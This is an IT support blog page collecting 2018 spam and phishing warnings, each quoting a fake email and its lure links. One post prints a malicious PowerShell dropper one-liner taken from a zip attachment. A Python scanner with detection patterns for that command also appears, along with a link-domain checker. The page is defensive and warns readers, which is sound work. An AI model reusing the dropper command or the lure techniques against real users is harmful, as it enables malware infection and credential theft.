sircles.net Computer Support The sircles IT support & solutions blog | SPAM

The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes

Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent

9. August 2018 07:19 by sirclesadmin in Internet Security, Online Fraud, SPAM

 

This email has been assembled from information sourced from your personal history online; in this example they have obtained an old telephone number from somewhere, probably sold to them by our local council.

 

From: Direct <theo-letran@glampiny.com>

Sent: Thursday, August 9, 2018 6:35 AM

To: Recipient

Subject: Your Name, Pack(50RM_84248) confirmed: 7 items sent

 

 

Order Acknowledgment

Dear Your name,

Your order is now confirmed. Thanks for shopping with us!

 

Billing Address:
Your Name 
Your Telephone Number Postcode 




Your Order Reference: 50RM_84248
Order Date: 8/9/2018

Delivery Address:
Your Name
Your Telephone Number Postcode

Your Order 50RM_84248 available here

Your right to cancel:

In addition to the EU and UK Distance Selling Regulations, we offer you 30 days to change your mind on any purchase.

To cancel the order, please complete the enclosed returns slip and return the item(s) to us at the address that is on the returns slip.

We recommend that you use a recorded delivery service.

Please note that you are responsible for the costs of returning the items to us unless the goods delivered are incorrect or faulty. In this case, you will be credited for the cost of your return up to a reasonable amount.

As soon as we receive your item(s) the returns procedure will be initiated and refunds will be processed.

 
 
The hyperlink 'Your Order 50RM_84248 available here' actually links to: https://kocobanana.com/.orderdetails/50RM_84248-confirmation which is presumably a genuine website, as it has a certificate, but it simply forwards you to: https://support.office.com/office-training-center?wt.mc_id=AID573689_QSG_184686 which is presumably not an association that Microsoft enjoy.
The actual link downloads a zip file:
 
The contents of the zip file are as follows:
 
 
And when extracted, reveal:
 
 
The image just being a Google Pay image:
 
 
And the shortcut linking to:
 
 
As we can see, this is another Windows PowerShell command, but one which we cannot make head or tail of: fildunare is not a term which any of us recognise, so any light anyone can shed would be most welcome.
Either way, it attempts to find the string fildunare in the .lnk files under your Documents folder and then invokes desktop.ps1, which does not actually seem to be included with any version of Windows and so is a bit of a mystery.
 
In any case, make sure that .ps1 files are blocked inside attachments, especially archive files, and this will not be an issue.
The originating email domain, glampiny.com, does not seem to be a working website either, so block that domain at your email server.

Spam Warning: You've received efax Notice

8. August 2018 07:58 by sirclesadmin in Internet Security, SPAM

 

We have seen this email throughout this week:

From: eFax j2 Global <efax@ramatmed.com>

Sent: Tuesday, August 7, 2018 7:52 PM

To: Recipient

Subject: You've received efax Notice

 

 

 

 

eFax_Faxing_Simplified

 

Fax Message; ID: 4734 745 7735,

You have got a 6 page(s) fax at 08-07-2018 08:34:55 GMT.

*Your reference number is ek4_pid02-88444959724931-3463741-40.

Visit www.efax.com/efax-help-center if you have any questions relating to this notification.



The eFax Team

 

j2 footer
2002-2018 j2 Global, Inc. and affiliates. All rights reserved.
eFax is a trademark of j2 Global, Inc.
22592 Hollywood Blvd, Los Angeles, CA 98613

*** This is an automatic message, please do not reply directly to this email address *** Privacy Policy.

The 'Get Fax Now' link actually points to: http://hvcrmls.info?82a6yp=QIUBNYQASHUBQYUDP which appears to have already been removed, but the site name is so bizarre that it makes you wonder if it ever existed. I am not going to invest time in looking it up, but this email is spam and should be reported.
The sender efax@ramatmed.com uses the domain of what appears to be a Los Angeles medical supplier, but the website is very spartan.
 

Spam Warning: You received notification from DocuSign Signature Service

7. August 2018 06:48 by sirclesadmin in Internet Security, Fraud, Online Fraud, SPAM

 

You may see the following email, purportedly from DocuSign. We have seen it caught by most spam filters, but it has also got through many of them on other occasions.

From: DocuSign Signature Service <docusign@pehache.com>

Sent: Monday, August 6, 2018 5:21 PM

To: Recipient

Subject: You received notification from DocuSign Signature Service

DocuSign

Review and sign this document.

 

Dear Receiver,

Please review this invoice
It is an automatically generated invoice.

 

This email contains a secure information. Do not share this code with other people.

Additional Signing Way
Please visit DocuSign.com, click on 'Access Documents', and enter the security code: F80B75BEF7

About Our Service
Sign invoice electronically in just minutes. It's risk-free. Whether you're at work, home or even across the globe -- Our service gives a professional solution for Digital Transaction Management.

Have questions about an Invoice?
In case you need to modify the document or have questions about the details in the document, reach out to the sender directly.

If you are having trouble signing the document, please see the Help with Signing page on our Webpage .
 

Review Invoice

This message was sent to you by DocuSign Electronic Signature Service.

 

 

The 'view invoice' link actually points at: http://keithharenda.com?6d50=QAUSY1CQVUFS1QXOBsGSJTHS which is an unsecured (plain HTTP) site that appears to have been compromised.
The folder appears to have already been removed.
We have also seen: http://nashvillechildfamilywellness.com?20Yy5=QAUSY1CQVUFS1QXOBsGSJTHS being used by the same email.
The 'review invoice' link at the bottom points to: http://kphbuilds.com?7P62A=QAUSY1CQVUFS1QXOBsGSJTHS which also appears to have been shut down.
 
Report any senders of this email; the pehache.com domain does not seem to function either.

Internal Revenue Service - Spam Warning !

1. August 2018 13:29 by sirclesadmin in Internet Security, Online Fraud, SPAM

Watch out for more free money!

This email has been received this week:

 

 

From: Internal Revenue Service <irs@aubodyshop.com>

Sent: Tuesday, July 31, 2018 6:16 PM

To: Recipient

Subject: Internal Revenue Service

 

IRS.gov Banner

Internal Revenue Service

IRS services     Account Balance communication TP95

 

Final reminder: Notice of Intent to seize (levy) your current income tax refund.


 

promptly: $449.20

Our files indicate that you have unpaid sum for the tax year closing December 31,2017 (Application form ). If you don't call us straight away, we may levy (seize) your house or legal rights to own property which includes any kind of tax refund and also apply it for the amount of money you must pay back.


Download your payment Invoice 


You're witnessing this particular notification due to the fact you're subscribed to our alerts via Internal revenue service.

 If you no more want to get warnings, please log in to your Internal revenue service account  to temporarily disable or completely delete these types of signals.

The following alert is sent to you automatically from the IRS services. Make sure you do not Write back.


Take care of your account, change your security password or e-mail, or discontinue messages at any time on your Personal preferences Web page.

If you have inquiries or problems with the service, be sure to contact www.paygov.us.



This service is delivered to you free of charge by the Internal Revenue Service. The following communication is provided through: IRS 1364 Constitution St. N Washington DC 21263.

Powered by GovDelivery

 

 
As this email has been received from a car repair shop (an auto body shop, if you're German/American) in Indianapolis, we can safely say that it is spam.
 
The link 'Download your payment Invoice' points to: http://cliptrips.info?8yi2O=QAUSY1CQVUFS1QXOBsGSJTHS
 
which has already been taken down; well done to whoever the owner is for spotting that...
 
Anyway report this email as spam and stay vigilant!
 

Ooh, a tax refund!! SPAM - (1) New message from GB Revenue and Taxes.

1. August 2018 12:35 by sirclesadmin in Internet Security, Fraud, Online Fraud, SPAM

 

This email has been received this week by the sircles spam catcher:

From: TaxesGreat-Britain <seminar@toitumosi.jp>

Sent: Wednesday, August 1, 2018 9:26 AM

To: Support

Subject: (1) New message from GB Revenue and Taxes.

 

 

-

Taxes&Revenue have detected that you have paid too much tax in the past

 

* Therefore we applied P800WForm to issue a reimbursment.

--we tried to send it to you automatically.

--we don't have your card details on file.

--have your credit/debit card ready

Reimbursement Information

* We applied P800WForm to issue a reimbursment.

* Receipt date : 01 August 2018.

* Amount: 670.25 GB P.

Delivery-Information

Card Type:

VISA

Credit Card:

****-****-****-****

Amount:

670.25

Transaction Date:

01/08/2018

Transaction #:

419277

 

 

Total  

670.25   GB P

 

-

 
 
As you can see, the originating address is actually from Japan, so it probably isn't that likely to be giving me a tax refund after all :(
 
The 'GB P' is a bit of a giveaway too: even in London, most people still use the British Pound without being prompted.
 
The 'Claim Funds' link points to: http://mocosi.co.za/img/acgetopai/ which is already flagged as deceptive by Chrome and as unsafe by Microsoft Edge.
 
The actual site:
 
 
Once you choose your wishes they take you to:
 
 
HMRC do not know your banking details, and will never ask you to confirm your identity with your card details or account number. This site is not secure (plain HTTP), so it should not be accepting card details anyway.
 
Never enter card details without checking that the padlock in the address bar is showing green or OK. Always check the domain in the address bar, all the way up to the first /, and make sure that everything before that / is just the expected domain, such as sircles.net, with nothing else attached to it; anything after the / is only the path.
 
Report this email and report the website.
 
Be safe!!!

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent


 

This email has been spotted this week:

From: lou_weihe@clarityconfidenceandcash.com

Sent: Monday, July 30, 2018 10:52 PM

To: Recipient

Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

 

WOMEN

MEN

ACCESSORIES

HOME DECOR

GADGETS


Hi Your Name,

Great news! Your order is now confirmed. We will email you again when your items ship.

Thanks for shopping with us!

Order ID: 4M0A_8141

Shipping Address:

Your Name
Your Phone Your Postcode 

View Order


This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us 

 

 
The 'View Order' link downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used for order confirmations anyway, but this website, https://johanwolf.com, obviously has a valid certificate and is being misused by someone. The website itself just seems to forward to Office 365 support for some reason.
 
If you unzip the file that is provided you see an image:
 
 
which is presumably meant to look like a real company.
 
And a file which runs a script:
 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
 
This could make serious changes to your system. Looking at it, we are not sure it would work, but we might try it on an old PC...
 
We will let you know.
 
Anyway, report the sender and the website and keep vigilant!
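The one-liner above, like the fildunare one in the earlier Pack(50RM_84248) post, runs PowerShell hidden with the execution policy bypassed, redirects findstr's matching lines out of the .lnk files into a .ps1 and then executes it, so the script body rides inside the shortcut and blocking .ps1 attachments alone will not catch it. The scanner below is an added example, not code from the original post: it unpacks an emailed zip in memory and flags both blocked extensions and the command-line indicators; the archive it scans is a constructed stand-in (fake image bytes plus a simplified text shortcut), with the marker string and file names taken from the post.

```python
"""Flag script droppers inside an emailed zip attachment (added example)."""
import io
import os
import re
import zipfile

# File types that should never arrive inside an emailed archive.
BLOCKED_EXT = {".ps1", ".lnk", ".exe", ".js", ".vbs", ".bat", ".cmd", ".hta", ".scr"}

# Pieces of the one-liner seen in the shortcut. Checked byte-wise, case-insensitively,
# on every member regardless of its extension.
INDICATORS = [
    (re.compile(rb"powershell(\.exe)?", re.I), "invokes powershell"),
    (re.compile(rb"-nop\b|-noprofile", re.I), "no-profile switch"),
    (re.compile(rb"-executionpolicy\s+bypass", re.I), "execution policy bypass"),
    (re.compile(rb"-win(dowstyle)?\s+hid", re.I), "hidden window"),
    (re.compile(rb"findstr\s+/s\s+\S+\s+\S*\.lnk\s*>\s*\S+\.ps1", re.I),
     "extracts a script body from .lnk files with findstr"),
]


def scan_member(name: str, data: bytes) -> list[str]:
    """Reasons this archive member should be blocked; an empty list means clean."""
    reasons = []
    ext = os.path.splitext(name)[1].lower()
    if ext in BLOCKED_EXT:
        reasons.append(f"blocked extension {ext}")
    hits = [label for pattern, label in INDICATORS if pattern.search(data)]
    if hits:
        reasons.append("script indicators: " + "; ".join(hits))
    return reasons


def scan_zip(blob: bytes) -> dict[str, list[str]]:
    """Map each suspicious member name to its block reasons (clean members are omitted)."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = scan_member(info.filename, zf.read(info))
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip() -> bytes:
    """Constructed stand-in for the attachment: fake image bytes plus a shortcut carrying the command."""
    # Real .lnk files are binary; this simplified imitation keeps only a header-like prefix
    # and the target command line, which is the part findstr and this scanner match on.
    lnk = (
        b"\x4c\x00\x00\x00" + b"\x00" * 16
        + b"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop "
        b"-executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\\Documents; "
        b"findstr /s bremodilu ..\\*.lnk > file.ps1;.\\file.ps1;exit\r\n"
        b"bremodilu # every line carrying the marker is what ends up in file.ps1\r\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("gpay.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)  # constructed image bytes
        zf.writestr("4M0A_8141-order-Receipt.lnk", lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(reasons))
```

The same check can be run on a real attachment by passing its bytes to scan_zip; the .png member is reported clean because neither its name nor its contents match anything.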
 
 

Spam Warning: Important Docs Secured ShareFile Attachment


 

Watch out for this email doing the rounds this week:

 

From: Tracy Turner <tturner@brealzeta.com>

Sent: Thursday, July 19, 2018 5:07 PM

Subject: Important Docs

 

 

Secured ShareFile Attachment

Expires July 20, 2018

Brealzeta.pdf

568.9 KB

Review Documents

I used WeTransfer to send documents to you securely. Learn More.

 

 

If you need any further assistance, then do not hesitate to contact me.

 

Tracy Turner
Breal Zeta CF Ltd
t: 07803 178446

 

The 'Review Documents' link actually points at https://theqfotaaerwrcgfd.co.uk/ces/ffw/(*%5E%25%26*(*%5E%24%25%5E%26%25%5E%24%25%23%23%24%25%5E%26 

 

So be careful here: this is a site served over HTTPS with a valid SSL certificate, so the padlock on its own tells you nothing about who is behind it:

 

 

The domain theqfotaaerwrcgfd.co.uk appears to be running on a cPanel server with a certificate from:

 

 

Comodo for cPanel.

 

From the look of the site: 

 

 

They seem to be impersonating WeTransfer and ShareFile at the same time, so this is obviously quite a big scam.

The website has been thoughtfully put together to steal important credentials, and a person who knows a Tracy Turner could easily enter all three of their Google, Office 365 and GoDaddy details.

 

The GoDaddy one is crafty, but obviously no document storage service in the world would ask for your internet domain credentials.

 

If you click the 'others' option, then you are taken through to a WeTransfer impersonation site:

 

https://theqfotaaerwrcgfd.co.uk/ces/ffw/(*%5e%25&*(*%5e$%25%5e&%25%5e$%25%23%23$%25%5e&/email_signin/index.html

 

 

 

Which is again a convincing looking site using the same certificate.

 

A RIPE whois lookup on the IP address gives this data:

% Information related to '89.36.218.0 - 89.36.218.255'

% Abuse contact for '89.36.218.0 - 89.36.218.255' is 'abuse@staff.aruba.it'

inetnum: 89.36.218.0 - 89.36.218.255
geoloc: 50.10 8.70
netname: CLOUD-DE
descr: Cloud Services DC05
country: DE
admin-c: SS936-RIPE
tech-c: AN3450-RIPE
status: ASSIGNED PA
mnt-by: ARUBA-MNT
mnt-lower: ARUBA-MNT
mnt-routes: XANDMAIL-MNT
created: 2016-01-11T14:37:36Z
last-modified: 2016-01-11T14:37:36Z
source: RIPE

role: ARUBA NOC
address: Aruba S.p.A.
address: via S.Clemente 53
address: 24036 Ponte San Pietro (BG)
address: Italy
abuse-mailbox: abuse@staff.aruba.it
admin-c: SS936-RIPE
tech-c: SC279-RIPE
nic-hdl: AN3450-RIPE
mnt-by: ARUBA-MNT
created: 2008-11-19T19:02:34Z
last-modified: 2017-11-15T08:13:57Z
source: RIPE # Filtered

person: Susanna Santini
address: Aruba S.p.A.
address: Via S.Clemente, 53
address: 24036 Ponte San Pietro (BG)
phone: +39 0575 0505
fax-no: +39 0575 862000
nic-hdl: SS936-RIPE
mnt-by: ARUBA-MNT
created: 1970-01-01T00:00:00Z
last-modified: 2017-11-15T08:14:40Z
source: RIPE # Filtered

% Information related to '89.36.216.0/22AS200185'

route: 89.36.216.0/22
descr: Aruba GmbH Cloud Network DC05
origin: AS200185
mnt-by: ARUBA-MNT
created: 2015-12-09T12:07:07Z
last-modified: 2015-12-09T12:07:25Z
source: RIPE

 

We will email the abuse address to report these sites...

Spam warning - HelloFax, Someone Sent You a Fax

10. July 2018 08:12 by sirclesadmin in Internet Security, SPAM

 

This email has been received in the last couple of days:

 

From: HelloFax <hellofax@abramscpa.com>

Sent: Monday, July 9, 2018 3:22 PM

To: Recipient

Subject: HelloFax, Someone Sent You a Fax

 

 

HelloFax

The best way to sign and send faxes on-line

Dear Customer,

Here is Your HelloFax

Date and Time: 07/09/2018 08:10 AM
Number of pages: 9

Reference number: TGD656358K.


Thank you for going paperless!
- HelloFax Team

 

We think your workplace can be paperless!
HelloFax Send Documents Online
HelloSign Sign Documents Online
HelloSign for Gmail Sign with Gmail

504 Howard Street, Suite 350
San Diego , CA

Add us to your address book

 
 
The 'Get Your Fax' link points to http://wegetthelintout.ca?7v7Rh=QAUSY1CQVUFS1QXOBsGSJTHS which no longer seems to respond, so the owners must have disabled it until the fraudulent pages have been removed.
Please report this message as spam anyway, to get the source address blacklisted.

SPAM: yourdomain.com Final Extension

19. June 2018 10:14 by sirclesadmin in Online Fraud, SPAM

 

Another domain renewal scam is circulating this week.

The format is the same as usual: danger, danger, danger, about to expire, your domain, final warning, etc.

Then right at the bottom it says something like:

Failure to make payment may result in account closing (making it difficult for your customers and your friends to locate you, using search engines on the web).

So it is actually a service to submit you to search engines.

 

Well, there is only really one search engine, unfortunately (although Ecosia's plan is a good one), so there is no need to pay someone to submit your pages. Google are quite capable of finding you themselves.

 

The email arrives as:

 

- ACT IMMEDIATELY -

FINAL EXTENSION

PURCHASE EXPIRATION DATE: 06.26.2018

 

Final Extension

 

LAST OVERDUE NOTICE FOR DOMAIN

Notice#: 049436077

your domain

Date: 06.19.2018

 

DOMAIN: yourdomain.suffix

ACCOUNT BALANCE: $0.00

 

PLEASE CLICK ON

 

TO CARRY OUT YOUR PAYMENT

 

PAYMENT

OVERDUE

!

 

Your Name

Address

Town

Region, Post Code, Country

 

Domain Name:

Registration Period:

Price:

Term:

YourDomain.suffix

Today to One year away

$84.00

1 Year

 

 

PLEASE CLICK ON

 

PAYMENT

OVERDUE

FOR


yourdomain.suffix

ACT TODAY!

 

Dear Your Name,

This is the final billing notice to complete this order by 1 Week failure to make payment may result in account closing (making it difficult for your customers and your friends to locate you, using search engines on the web).

 

 

PLEASE NOTE:

This Email contains information intended only for the individuals or entities to which it is addressed. If you are not the intended recipient or the agent responsible for delivering it to the intended recipient, or have received this Email in error, please notify immediately the sender of this Email and then completely delete it (including any attachments). Any other action taken in reliance upon this Email is strictly prohibited, including but not limited to unauthorized copying, printing, disclosure, or distribution. The sender bears no responsibility for any loss, disruption or damage to your data or computer system that may occur while using data contained in, or transmitted with, this Email. Any views expressed are personal unless otherwise stated. unlike here Providing false information will result in suspension of the customer's account.Thank you for your cooperation.
The unsubscribe link points to: http://yourdomain.com.onlineadvice.top/unsubscribe/

The secure payment link links to: http://yourdomain.suffix.onlineadvice.top/?d=yourdomain&y=06.27.2018
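Both links put the victim's own domain in front of onlineadvice.top, which is exactly the case the address-bar rule in the HMRC post above warns about: only the part before the first / matters, and the expected name has to be the end of that part, not the start. The check below is an added example, not code from the original post; the first two links are the ones quoted above, while the sircles.net controls and the expected-domain names are constructed.

```python
"""Decide whether a link really lands on the domain you expect (added example)."""
from urllib.parse import urlsplit


def host_of(url: str) -> str:
    """Everything between the scheme and the first '/', lower-cased by urlsplit."""
    if "://" not in url:          # a bare 'example.com/path' as typed into the bar
        url = "http://" + url
    return (urlsplit(url).hostname or "").rstrip(".")


def is_expected_domain(url: str, expected: str) -> bool:
    """True only if the host IS the expected domain or ends with '.' + expected.

    'yourdomain.com.onlineadvice.top' starts with yourdomain.com, but the domain
    that was actually registered is onlineadvice.top, so it fails this test.
    """
    host = host_of(url)
    expected = expected.lower().rstrip(".")
    return host == expected or host.endswith("." + expected)


def check_link(url: str, expected: str) -> dict:
    """Summarise the three things to look at before typing any details into a page."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return {
        "host": host_of(url),
        "domain_ok": is_expected_domain(url, expected),
        "https": parts.scheme == "https",   # the padlock: no TLS, no card details
        "path": parts.path or "/",          # after the first '/': irrelevant to trust
    }


# The two links quoted from the 'Final Extension' email plus constructed controls.
SAMPLE_LINKS = [
    ("http://yourdomain.com.onlineadvice.top/unsubscribe/", "yourdomain.com"),
    ("http://yourdomain.suffix.onlineadvice.top/?d=yourdomain&y=06.27.2018", "yourdomain.suffix"),
    ("https://sircles.net/blog/spam", "sircles.net"),               # constructed, genuine
    ("https://www.sircles.net/", "sircles.net"),                    # constructed, genuine subdomain
    ("https://sircles.net.onlineadvice.top/login", "sircles.net"),  # constructed, same trick
]

if __name__ == "__main__":
    for link, expected in SAMPLE_LINKS:
        verdict = "OK " if is_expected_domain(link, expected) else "BAD"
        print(verdict, check_link(link, expected))
```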

Report the website onlineadvice.top as spam, and the website it takes you to, seockaccepted.org, should be reported as a phishing site.

Report the email as spam.

Many thanks.
SECURITY ALERT - Tesco Bank Spam Scam

12. June 2018 07:33 by sirclesadmin in Fraud, Online Fraud, SPAM

 

Beware of these fake Tesco spam emails:

 

From: TescoBankOnline@mail.net

Sent: 11 June 2018 16:24

To: Recipient

Subject: SECURITY ALERT

 

 

SECURITY ALERT  

You are receiving this email because we noticed an attempt to sign in to your account from an unrecognised device. Our system has blocked this sign in attempt as a security measure. 


In order to safeguard your account information we have temporarily restricted your access to certain features within our online banking system. To restore full access please click the link below to validate your account information.

Please note:
 Failure to restore full access can lead to permanent suspension of access to our online banking service.

==================================================
Get Started ⇨
==================================================

Best regards,


Tesco  Online Banking Team

 

The 'Get Started' link actually takes you to: https://newsforeveryone.top/tescoOnline/index.php

Cloudflare have already labelled this site as phishing: